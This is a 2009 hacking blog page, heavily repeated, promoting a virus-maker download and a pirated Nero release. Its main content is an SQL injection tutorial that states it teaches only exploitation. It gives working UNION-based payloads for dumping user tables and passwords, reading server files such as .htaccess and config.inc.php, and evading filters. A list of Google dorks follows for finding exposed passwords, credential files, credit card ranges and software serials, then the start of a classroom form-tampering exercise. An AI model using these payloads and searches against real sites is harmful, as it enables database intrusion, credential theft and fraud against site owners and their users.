Saturday, August 29, 2009
JPS Virus Maker v3.0
http://aka-core.blogspot.com/2009/08/kaspersky-2010-and-keys.htmlThis is the most dangerous of all hacking tools as it allows complete and total control of the infected computer
DOWNLOAD LINK::
JPS Virus Maker v3.0
http://aka-core.blogspot.com/2009/08/kaspersky-2010-and-keys.htmlThis is the most dangerous of all hacking tools as it allows complete and total control of the infected computer
DOWNLOAD LINK::
Nero 9 micro -Auto Registered-
Is a simple to master, but powerful program for recording CD and DVD, and now Blu-ray and HD DVD. In this program, intuitive user interface. The program is such that they allow to burn a CD of all the current standards, including audio and video CD. As a source of information for recording disks can serve as files on your computer, as well as other CDs
installation build (14 August)
-autoregistration implemented
languages :
English (EN)
Greek (ELL)
Deutsche (DEU)
Dutch (NLD)
Spanish (ESP)
French (FRA)
Italian (ITA)
Russian (RUS)
Turkish (TRK)
installation build (14 August)
-autoregistration implemented
languages :
English (EN)
Greek (ELL)
Deutsche (DEU)
Dutch (NLD)
Spanish (ESP)
French (FRA)
Italian (ITA)
Russian (RUS)
Turkish (TRK)
Nero 9 micro -Auto Registered-
Is a simple to master, but powerful program for recording CD and DVD, and now Blu-ray and HD DVD. In this program, intuitive user interface. The program is such that they allow to burn a CD of all the current standards, including audio and video CD. As a source of information for recording disks can serve as files on your computer, as well as other CDs
installation build (14 August)
-autoregistration implemented
languages :
English (EN)
Greek (ELL)
Deutsche (DEU)
Dutch (NLD)
Spanish (ESP)
French (FRA)
Italian (ITA)
Russian (RUS)
Turkish (TRK)
installation build (14 August)
-autoregistration implemented
languages :
English (EN)
Greek (ELL)
Deutsche (DEU)
Dutch (NLD)
Spanish (ESP)
French (FRA)
Italian (ITA)
Russian (RUS)
Turkish (TRK)
...::SQL Injection Attacks::...
::What is SQL Injection?::
-SQL Injection is defined by http://www.h-spot.net/threat_glossary.htm as: "The act of entering malformed or unexpected data (perhaps into a front-end web form or front-end application for example) so that the back-end SQL database running behind the website or application executes SQL commands that the programmer never intended to permit, possibly allowing an intruder to break into or damage the database."
::Background Information::
-It is considered the most common web vulnerability today
-It's a flaw in the web application--not the db, or the server
-Can be injected into: Cookies, Forms, and URL parameters
::Lesson Facts::
-This lesson uses MySQL syntax for all examples.
-This lesson does not provide reasons for why sites are vulnerable, simply how to exploit them
-This lesson only provides sql injection examples for url parameters such it is such a large subject on it's own
-This lesson gives small examples of filter evasion techniques
::The Lesson::
-Some commands you will need to know:
'union all select': combines two or more select statements into one query and returns all rows
'order by': used to sort rows after a select statement is executed
'load_file()': loads a local file from the site or server examples would be .htaccess or /etc/passwd
'char()': used to change decimal ascii to strings, can be used for filter evasion--in sql injections, used in conjunction with load_file
'concat()': combines more than one column into a single column, enabling more columns to be selected than the number that are showing on the page (You will understand better later)
'--': a comment
'/*': another type of comment
-Injection SQL Queries into URL Parameters
So you've found a site: 'http://www.site.com/index.php?id=5', and want to test if it's vulnerable to SQL Injections.
1) Begin by checking if you can execute some of your own queries, so try:
/index.php?id=5 and 1=0--
If after executing the above statement, nothing has happened and the page has remained the same, you can try:
/index.php?id='
If neither of those work, for the purposes of this tutorial move on to another site.
Otherwise, if a blank page showed up you just might be in luck!
2) Now we want to find how many columns and which ones are showing when the select statement is executed so we use:
/index.php?id=5 order by 20
If you get an error decrement the number 20, if there is no error continue incrementing until you get one and then the number just before your error is the number of columns in the table you're selecting from.
Example:
/index.php?id=5 order by 15 <--returns no error, but /index.php?id=5 order by 16 <--returns an error, then we know that there are 15 columns in our select statement.
3) The next statement will null the id=5 so the script only executes our commands and not it's own, and show us which columns we can extract data from:
/index.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- <--The comment comments out anything the script would append to the end of the statement so that only our statement is looked at.
So now look at the page and if you see any of the numbers you just typed in, you know those columns are showing, and we can gather information from them. For this example let's pretend columns 5, 7, and 9 are showing.
4) Now we can begin gathering information!
/index.php?id=null union all select 1,2,3,4,user(),6,database(),8,version(),10,11,12,13,14,15--
As you can see we selected values from the showing columns, what if we want to clean this up a bit, and put all of those selected values in one column? This is where concat() comes in:
/index.php?id=null union all select 1,2,3,4,concat(user(),char(58),database(),char(58),version()),6,7,8,9,10,11,12,13,14,15--
Now look at your page, user(), database(), and version() are all in one place, and are separated by a colon this demonstrates the use of concat() and char().
The user() will usually give something like username@localhost, but you may get lucky and get username@ipaddresshere, in this instance you can try to brute force the FTP login. The version would help you look up exploits for that version of the database() in use--but only if you're a skiddy!
5) Before we can check if we have load_file perms, we must get an FPD (Full Path Disclosure) so we know exactly where the files are located that we're trying to open. Below are some methods to get an FPD:
-/index.php?id[]=
-You could attempt to Google the full path of the site by trying something like "/home/sitename" and hoping that you'll find something in Google
-"Session Cookie Trick" <--Thanks to haZed at enigmagroup.org. In the url type: 'javascript:void(document.cookie="PHPSESSID=");' This will give a session_start() error and an FPD.
Now we will attempt to use load_file(), this example will load the .htaccess file, make sure you know the file you're trying to load actually exists or you may miss out on your opportunity to realize what great perms you have:
/index.php?id=null union all select 1,2,3,4,load_file(char(47, 104, 111, 109, 101, 47, 115, 105, 116, 101, 110, 97, 109, 101, 47, 100, 105, 114, 47, 97, 108, 108, 111, 102, 116, 104, 105, 115, 105, 115, 102, 114, 111, 109, 111, 117, 114, 102, 112, 100, 47, 46, 104, 116, 97, 99, 99, 101, 115, 115)),6,7,8,9,10,11,12,13,14,15--
If you see the .htaccess file, congrats! You have load_file() perms. Now try to load include files such as config.inc.php for database usernames and passwords, hoping that the admin is dumb enough to use the same username and password for ftp. Another idea would be to load .htpasswd after finding it's location from .htaccess and then logging in to all the password-protected areas that you want to on the site.
If you don't see the .htaccess file, I will include one more way to extract info by using sql injections.
-Using information_schema.tables:
So you don't have load_file() perms? No problem, we can check for information_schema.tables.
1) 'table_name' is the name of a table that exists in all information_schema tables on every site:
/index.php?id=null union all select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables--
If the site is showing information_schema.tables, the words 'CHARACTER_SETS' will appear in column 5. What can I do with CHARACTER_SETS you might be wondering. Well, nothing that I'm going to show you, but you can find out other tables that exist on the site. The information_schema.tables contains a list of every table in the database on the site, so you can pull up the table username and maybe password if they exist...Then what do you think the information_schema.columns hold? That's right, a list of all the columns on the site. So rather than using just the above injection you could try any of the following:
-/index.php?id=null union all select 1,2,3,4,distinct table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables-- <--Selects all 'distinct' table names from information_schema.tables, meaning it will print out all tables at one time
-/index.php?id=null union all select 1,2,3,4,concat(table_name,char(58),column_name),6,7,8,9,10,11,12,13,14,15 from information_schema.columns-- <--Selects all tables and columns that go with each table seperated by a colon
2) If none of the above queries give you anything except for 'CHARACTER_SETS' you will have to use enumeration to determine the names of the other tables:
/index.php?id=null union all select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_name != "CHARACTER_SETS"--
Then it would show the next table in line so you would modify the above to say:
where table_name != "CHARACTER_SETS" and table_name != "nexttableinline"--
Until no more tables show, then you can do the same for the columns.
3) Now after you've executed one or all of those statements, let's say you found the table 'users' and it has the columns 'username', 'password', 'id', and 'email'. To extract that info from the table, use:
/index.php?id=null union all select 1,2,3,4,concat(username, char(58), password, char(58), id, char(58), email),6,7,8,9,10,11,12,13,14,15 from users--
And you'll get the info you requested, of course you can modify that as you like such as:
-/index.php?id=null union all select 1,2,3,4,username,6,password,8,9,10,11,12,13,14,15 from users where id=1--
-/index.php?id=null union all select 1,2,3,4,concat(password, char(58), id, char(58), email),6,7,8,9,10,11,12,13,14,15 from users where username='Admin' <--Replacing Admin with the top user's name such as admin or owner etc..
::Final Tips::
With any luck, one of these methods has worked for you and you were able to accomplish your goal. However, if none of them worked, you can start guessing common table names and then columns:
/index.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from users-- <--If the page shows up, you know the table exists and you can start guessing column names:
/index.php?id=null union all select 1,2,3,4,username,6,7,8,9,10,11,12,13,14,15 from users-- <--If you get a username, good job you guessed a correct table and column, otherwise keep guessing.
::Filter Evasion Techniques::
-You can URL Encode characters, hex encode them, use any encoding you like as long as your browser can interpret it
-Rather then using 'union all select' try 'UniON aLL SeLECt' to see if the filter checks case
-Try using the plus sign to split words up: ' 'uni'+'on'+' '+'all'+' '+'Se'+'lect'
-Combine the methods mentioned above using different cases, the plus operator, and not just text but encoding as well
-Be creative
::Conclusion::
Thank you for reading my article, please comment if you found it interesting, found it helpful, or even hated it.
Thanks to EnigMaGroup and OwasP
CORE™
...::SQL Injection Attacks::...
::What is SQL Injection?::
-SQL Injection is defined by http://www.h-spot.net/threat_glossary.htm as: "The act of entering malformed or unexpected data (perhaps into a front-end web form or front-end application for example) so that the back-end SQL database running behind the website or application executes SQL commands that the programmer never intended to permit, possibly allowing an intruder to break into or damage the database."
::Background Information::
-It is considered the most common web vulnerability today
-It's a flaw in the web application--not the db, or the server
-Can be injected into: Cookies, Forms, and URL parameters
::Lesson Facts::
-This lesson uses MySQL syntax for all examples.
-This lesson does not provide reasons for why sites are vulnerable, simply how to exploit them
-This lesson only provides sql injection examples for url parameters such it is such a large subject on it's own
-This lesson gives small examples of filter evasion techniques
::The Lesson::
-Some commands you will need to know:
'union all select': combines two or more select statements into one query and returns all rows
'order by': used to sort rows after a select statement is executed
'load_file()': loads a local file from the site or server examples would be .htaccess or /etc/passwd
'char()': used to change decimal ascii to strings, can be used for filter evasion--in sql injections, used in conjunction with load_file
'concat()': combines more than one column into a single column, enabling more columns to be selected than the number that are showing on the page (You will understand better later)
'--': a comment
'/*': another type of comment
-Injection SQL Queries into URL Parameters
So you've found a site: 'http://www.site.com/index.php?id=5', and want to test if it's vulnerable to SQL Injections.
1) Begin by checking if you can execute some of your own queries, so try:
/index.php?id=5 and 1=0--
If after executing the above statement, nothing has happened and the page has remained the same, you can try:
/index.php?id='
If neither of those work, for the purposes of this tutorial move on to another site.
Otherwise, if a blank page showed up you just might be in luck!
2) Now we want to find how many columns and which ones are showing when the select statement is executed so we use:
/index.php?id=5 order by 20
If you get an error decrement the number 20, if there is no error continue incrementing until you get one and then the number just before your error is the number of columns in the table you're selecting from.
Example:
/index.php?id=5 order by 15 <--returns no error, but /index.php?id=5 order by 16 <--returns an error, then we know that there are 15 columns in our select statement.
3) The next statement will null the id=5 so the script only executes our commands and not it's own, and show us which columns we can extract data from:
/index.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- <--The comment comments out anything the script would append to the end of the statement so that only our statement is looked at.
So now look at the page and if you see any of the numbers you just typed in, you know those columns are showing, and we can gather information from them. For this example let's pretend columns 5, 7, and 9 are showing.
4) Now we can begin gathering information!
/index.php?id=null union all select 1,2,3,4,user(),6,database(),8,version(),10,11,12,13,14,15--
As you can see we selected values from the showing columns, what if we want to clean this up a bit, and put all of those selected values in one column? This is where concat() comes in:
/index.php?id=null union all select 1,2,3,4,concat(user(),char(58),database(),char(58),version()),6,7,8,9,10,11,12,13,14,15--
Now look at your page, user(), database(), and version() are all in one place, and are separated by a colon this demonstrates the use of concat() and char().
The user() will usually give something like username@localhost, but you may get lucky and get username@ipaddresshere, in this instance you can try to brute force the FTP login. The version would help you look up exploits for that version of the database() in use--but only if you're a skiddy!
5) Before we can check if we have load_file perms, we must get an FPD (Full Path Disclosure) so we know exactly where the files are located that we're trying to open. Below are some methods to get an FPD:
-/index.php?id[]=
-You could attempt to Google the full path of the site by trying something like "/home/sitename" and hoping that you'll find something in Google
-"Session Cookie Trick" <--Thanks to haZed at enigmagroup.org. In the url type: 'javascript:void(document.cookie="PHPSESSID=");' This will give a session_start() error and an FPD.
Now we will attempt to use load_file(), this example will load the .htaccess file, make sure you know the file you're trying to load actually exists or you may miss out on your opportunity to realize what great perms you have:
/index.php?id=null union all select 1,2,3,4,load_file(char(47, 104, 111, 109, 101, 47, 115, 105, 116, 101, 110, 97, 109, 101, 47, 100, 105, 114, 47, 97, 108, 108, 111, 102, 116, 104, 105, 115, 105, 115, 102, 114, 111, 109, 111, 117, 114, 102, 112, 100, 47, 46, 104, 116, 97, 99, 99, 101, 115, 115)),6,7,8,9,10,11,12,13,14,15--
If you see the .htaccess file, congrats! You have load_file() perms. Now try to load include files such as config.inc.php for database usernames and passwords, hoping that the admin is dumb enough to use the same username and password for ftp. Another idea would be to load .htpasswd after finding it's location from .htaccess and then logging in to all the password-protected areas that you want to on the site.
If you don't see the .htaccess file, I will include one more way to extract info by using sql injections.
-Using information_schema.tables:
So you don't have load_file() perms? No problem, we can check for information_schema.tables.
1) 'table_name' is the name of a table that exists in all information_schema tables on every site:
/index.php?id=null union all select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables--
If the site is showing information_schema.tables, the words 'CHARACTER_SETS' will appear in column 5. What can I do with CHARACTER_SETS you might be wondering. Well, nothing that I'm going to show you, but you can find out other tables that exist on the site. The information_schema.tables contains a list of every table in the database on the site, so you can pull up the table username and maybe password if they exist...Then what do you think the information_schema.columns hold? That's right, a list of all the columns on the site. So rather than using just the above injection you could try any of the following:
-/index.php?id=null union all select 1,2,3,4,distinct table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables-- <--Selects all 'distinct' table names from information_schema.tables, meaning it will print out all tables at one time
-/index.php?id=null union all select 1,2,3,4,concat(table_name,char(58),column_name),6,7,8,9,10,11,12,13,14,15 from information_schema.columns-- <--Selects all tables and columns that go with each table seperated by a colon
2) If none of the above queries give you anything except for 'CHARACTER_SETS' you will have to use enumeration to determine the names of the other tables:
/index.php?id=null union all select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_name != "CHARACTER_SETS"--
Then it would show the next table in line so you would modify the above to say:
where table_name != "CHARACTER_SETS" and table_name != "nexttableinline"--
Until no more tables show, then you can do the same for the columns.
3) Now after you've executed one or all of those statements, let's say you found the table 'users' and it has the columns 'username', 'password', 'id', and 'email'. To extract that info from the table, use:
/index.php?id=null union all select 1,2,3,4,concat(username, char(58), password, char(58), id, char(58), email),6,7,8,9,10,11,12,13,14,15 from users--
And you'll get the info you requested, of course you can modify that as you like such as:
-/index.php?id=null union all select 1,2,3,4,username,6,password,8,9,10,11,12,13,14,15 from users where id=1--
-/index.php?id=null union all select 1,2,3,4,concat(password, char(58), id, char(58), email),6,7,8,9,10,11,12,13,14,15 from users where username='Admin' <--Replacing Admin with the top user's name such as admin or owner etc..
::Final Tips::
With any luck, one of these methods has worked for you and you were able to accomplish your goal. However, if none of them worked, you can start guessing common table names and then columns:
/index.php?id=null union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from users-- <--If the page shows up, you know the table exists and you can start guessing column names:
/index.php?id=null union all select 1,2,3,4,username,6,7,8,9,10,11,12,13,14,15 from users-- <--If you get a username, good job you guessed a correct table and column, otherwise keep guessing.
::Filter Evasion Techniques::
-You can URL Encode characters, hex encode them, use any encoding you like as long as your browser can interpret it
-Rather then using 'union all select' try 'UniON aLL SeLECt' to see if the filter checks case
-Try using the plus sign to split words up: ' 'uni'+'on'+' '+'all'+' '+'Se'+'lect'
-Combine the methods mentioned above using different cases, the plus operator, and not just text but encoding as well
-Be creative
::Conclusion::
Thank you for reading my article, please comment if you found it interesting, found it helpful, or even hated it.
Thanks to EnigMaGroup and OwasP
CORE™
Google Hacking
Google hacking at its finest..
Using Google, and some finely crafted searches we can find a lot of interesting information.
For Example we can find:
Credit Card Numbers
Passwords
Software / MP3's
...... (and on and on and on) Presented below is just a sample of interesting searches that we can send to google to obtain info that some people might not want us having.. After you get a taste using some of these, try your own crafted searches to find info that you would be interested in.
Try a few of these searches:
intitle:"Index of" passwords modified
allinurl:auth_user_file.txt
"access denied for user" "using password"
"A syntax error has occurred" filetype:ihtml
allinurl: admin mdb
"ORA-00921: unexpected end of SQL command"
inurl:passlist.txt
"Index of /backup"
"Chatologica MetaSearch" "stack tracking:"
Amex Numbers: 300000000000000..399999999999999
MC Numbers: 5178000000000000..5178999999999999
visa 4356000000000000..4356999999999999
"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
Notice that I am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.
METHOD 2
put this string in google search:
?intitle:index.of? mp3
You only need add the name of the song/artist/singer.
Example: ?intitle:index.of? mp3 jackson
METHOD 3
put this string in google search:
inurl:microsoft filetype:iso
You can change the string to watever you want, ex. microsoft to adobe, iso to zip etc…
"# -FrontPage-" inurl:service.pwd
Frontpage passwords.. very nice clean search results listing !!
"AutoCreate=TRUE password=*"
This searches the password for "Website Access Analyzer", a Japanese software that creates webstatistics. For those who can read Japanese, check out the author's site at: http://www.coara.or.jp/~passy/
"http://*:*@www" domainname
This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net
"http://*:*@www" bangbus or "http://*:*@www"bangbus
Another way is by just typing
"http://bob:bob@www"
"sets mode: +k"
This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.
allinurl: admin mdb
Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are!
allinurl:auth_user_file.txt
DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)
intitle:"Index of" config.php
This search brings up sites with "config.php" files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database.
eggdrop filetype:user user
These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.
intitle:index.of.etc
This search gets you access to the etc directory, where many many many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun!
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version).
Every attacker knows that changing the extenstion of a file on a webserver can have ugly consequences.
Let's pretend you need a serial number for windows xp pro.
In the google search bar type in just like this - "Windows XP Professional" 94FBR
the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of 'fake' porn sites that trick you.
or if you want to find the serial for winzip 8.1 - "Winzip 8.1" 94FBR
Using Google, and some finely crafted searches we can find a lot of interesting information.
For Example we can find:
Credit Card Numbers
Passwords
Software / MP3's
...... (and on and on and on) Presented below is just a sample of interesting searches that we can send to google to obtain info that some people might not want us having.. After you get a taste using some of these, try your own crafted searches to find info that you would be interested in.
Try a few of these searches:
intitle:"Index of" passwords modified
allinurl:auth_user_file.txt
"access denied for user" "using password"
"A syntax error has occurred" filetype:ihtml
allinurl: admin mdb
"ORA-00921: unexpected end of SQL command"
inurl:passlist.txt
"Index of /backup"
"Chatologica MetaSearch" "stack tracking:"
Amex Numbers: 300000000000000..399999999999999
MC Numbers: 5178000000000000..5178999999999999
visa 4356000000000000..4356999999999999
"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
Notice that I am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.
METHOD 2
put this string in google search:
?intitle:index.of? mp3
You only need add the name of the song/artist/singer.
Example: ?intitle:index.of? mp3 jackson
METHOD 3
put this string in google search:
inurl:microsoft filetype:iso
You can change the string to watever you want, ex. microsoft to adobe, iso to zip etc…
"# -FrontPage-" inurl:service.pwd
Frontpage passwords.. very nice clean search results listing !!
"AutoCreate=TRUE password=*"
This searches the password for "Website Access Analyzer", a Japanese software that creates webstatistics. For those who can read Japanese, check out the author's site at: http://www.coara.or.jp/~passy/
"http://*:*@www" domainname
This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net
"http://*:*@www" bangbus or "http://*:*@www"bangbus
Another way is by just typing
"http://bob:bob@www"
"sets mode: +k"
This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.
allinurl: admin mdb
Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are!
allinurl:auth_user_file.txt
DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)
intitle:"Index of" config.php
This search brings up sites with "config.php" files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database.
eggdrop filetype:user user
These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.
intitle:index.of.etc
This search gets you access to the etc directory, where many many many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun!
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version).
Every attacker knows that changing the extenstion of a file on a webserver can have ugly consequences.
Let's pretend you need a serial number for windows xp pro.
In the google search bar type in just like this - "Windows XP Professional" 94FBR
the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of 'fake' porn sites that trick you.
or if you want to find the serial for winzip 8.1 - "Winzip 8.1" 94FBR
CORE™
Google Hacking
Google hacking at its finest..
Using Google, and some finely crafted searches we can find a lot of interesting information.
For Example we can find:
Credit Card Numbers
Passwords
Software / MP3's
...... (and on and on and on) Presented below is just a sample of interesting searches that we can send to google to obtain info that some people might not want us having.. After you get a taste using some of these, try your own crafted searches to find info that you would be interested in.
Try a few of these searches:
intitle:"Index of" passwords modified
allinurl:auth_user_file.txt
"access denied for user" "using password"
"A syntax error has occurred" filetype:ihtml
allinurl: admin mdb
"ORA-00921: unexpected end of SQL command"
inurl:passlist.txt
"Index of /backup"
"Chatologica MetaSearch" "stack tracking:"
Amex Numbers: 300000000000000..399999999999999
MC Numbers: 5178000000000000..5178999999999999
visa 4356000000000000..4356999999999999
"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
Notice that I am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.
METHOD 2
put this string in google search:
?intitle:index.of? mp3
You only need add the name of the song/artist/singer.
Example: ?intitle:index.of? mp3 jackson
METHOD 3
put this string in google search:
inurl:microsoft filetype:iso
You can change the string to watever you want, ex. microsoft to adobe, iso to zip etc…
"# -FrontPage-" inurl:service.pwd
Frontpage passwords.. very nice clean search results listing !!
"AutoCreate=TRUE password=*"
This searches the password for "Website Access Analyzer", a Japanese software that creates webstatistics. For those who can read Japanese, check out the author's site at: http://www.coara.or.jp/~passy/
"http://*:*@www" domainname
This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net
"http://*:*@www" bangbus or "http://*:*@www"bangbus
Another way is by just typing
"http://bob:bob@www"
"sets mode: +k"
This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.
allinurl: admin mdb
Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are!
allinurl:auth_user_file.txt
DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)
intitle:"Index of" config.php
This search brings up sites with "config.php" files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database.
eggdrop filetype:user user
These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.
intitle:index.of.etc
This search gets you access to the etc directory, where many many many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun!
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version).
Every attacker knows that changing the extenstion of a file on a webserver can have ugly consequences.
Let's pretend you need a serial number for windows xp pro.
In the google search bar type in just like this - "Windows XP Professional" 94FBR
the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of 'fake' porn sites that trick you.
or if you want to find the serial for winzip 8.1 - "Winzip 8.1" 94FBR
Using Google, and some finely crafted searches we can find a lot of interesting information.
For Example we can find:
Credit Card Numbers
Passwords
Software / MP3's
...... (and on and on and on) Presented below is just a sample of interesting searches that we can send to google to obtain info that some people might not want us having.. After you get a taste using some of these, try your own crafted searches to find info that you would be interested in.
Try a few of these searches:
intitle:"Index of" passwords modified
allinurl:auth_user_file.txt
"access denied for user" "using password"
"A syntax error has occurred" filetype:ihtml
allinurl: admin mdb
"ORA-00921: unexpected end of SQL command"
inurl:passlist.txt
"Index of /backup"
"Chatologica MetaSearch" "stack tracking:"
Amex Numbers: 300000000000000..399999999999999
MC Numbers: 5178000000000000..5178999999999999
visa 4356000000000000..4356999999999999
"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
Notice that I am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.
METHOD 2
put this string in google search:
?intitle:index.of? mp3
You only need add the name of the song/artist/singer.
Example: ?intitle:index.of? mp3 jackson
METHOD 3
put this string in google search:
inurl:microsoft filetype:iso
You can change the string to watever you want, ex. microsoft to adobe, iso to zip etc…
"# -FrontPage-" inurl:service.pwd
Frontpage passwords.. very nice clean search results listing !!
"AutoCreate=TRUE password=*"
This searches the password for "Website Access Analyzer", a Japanese software that creates webstatistics. For those who can read Japanese, check out the author's site at: http://www.coara.or.jp/~passy/
"http://*:*@www" domainname
This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net
"http://*:*@www" bangbus or "http://*:*@www"bangbus
Another way is by just typing
"http://bob:bob@www"
"sets mode: +k"
This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs.
allinurl: admin mdb
Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are!
allinurl:auth_user_file.txt
DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)
intitle:"Index of" config.php
This search brings up sites with "config.php" files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database.
eggdrop filetype:user user
These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users.
intitle:index.of.etc
This search gets you access to the etc directory, where many many many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun!
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version).
Every attacker knows that changing the extenstion of a file on a webserver can have ugly consequences.
Let's pretend you need a serial number for windows xp pro.
In the google search bar type in just like this - "Windows XP Professional" 94FBR
the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of 'fake' porn sites that trick you.
or if you want to find the serial for winzip 8.1 - "Winzip 8.1" 94FBR
CORE™
WEB HACKING
Your objective today is to crack this application. However, please try to avoid causing real damage to the site, as many people need to use it
First steps
There are several users set up for this application with user names from aa to zz (with passwords the same as user names). There is a further user whose identity you may discover in the course of your investigations. You should use a user name that relates to your workstation ID, so if your workstation is CS206a, your user name will be aa
Try the application. See what it is supposed to do. Are there any exploits which immediately spring to mind? See what happens if you enter
instead of an email address into the optional email input box
In itself the result of doing this is mildly irritating but not especially harmful. What might a malicious user be able to do to make it more dangerous? e.g. hints
- JavaSpt can be used to load a new page to replace the existing one
- Bad HTML (especially in tables) can wreck a page
You may spot one or two other flaws- a good trick is to try to enter unlikely data into form fields. My personal favourite characters are the following
? ' > < % \ | #
Note that in this application only a couple of these will cause surprising effects
Most of the application's flaws will only become obvious with a bit more probing
Looking at the HTML
Now save the form to a local directory (save it with a .html extension, then it will be easier to use
Look at the source code. Try to work out how to give yourself a very good mark in the test
Some starting points
Your first task will probably be to modify the action of the form to point to the absolute URL of the receiving pageTry to work out how the application allocates marks. If you think that the method used seems silly, I have seen real applications which allocated real test scores for real students which do this
Are there any hidden fields that you might modify
It would be a bit easier to hack if you could see the information sent from the form to the receiving page. Modify the form to use GET instead of POST. This will then allow you to play with the data sent to the page directly, rather than via the form.
More advanced
